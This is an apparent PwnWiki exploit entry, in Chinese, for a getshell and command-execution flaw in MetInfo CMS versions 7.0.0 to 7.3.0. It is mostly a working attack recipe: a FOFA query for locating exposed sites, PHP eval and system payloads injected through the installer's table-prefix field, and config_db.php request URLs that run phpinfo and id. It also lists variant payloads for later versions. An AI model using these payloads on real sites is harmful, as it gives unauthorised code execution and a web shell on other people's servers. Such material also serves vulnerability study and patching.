米拓建站系統 getshell&命令執行漏洞
From PwnWiki
FOFA
body="MetInfo"
影響版本
7.3.0- 7.0.0
漏洞利用
在安裝該CMS - 【設置數據庫信息(數據表前綴)】:
代碼執行Payload:
"/@eval($_GET['1']);/
命令執行payload:
"/@system($_GET['1']);/
點擊保存進行下一步驗證,出現報錯信息
(這裏的Payload是代碼執行)
訪問以下url:
http://<target>/config/config_db.php?1=phpinfo();
可以看到成功執行了phpinfo
(這裏的Payload是命令執行)
訪問以下URL:
http://<target>/config/config_db.php?1=id();
成功執行id命令。
其他
Version 7.10 Payload:"/@eval($_GET['1']);@system($_GET['2']);/
Version 7.20 Payload: "/@eval($_GET['1']);@system($_GET['2']);/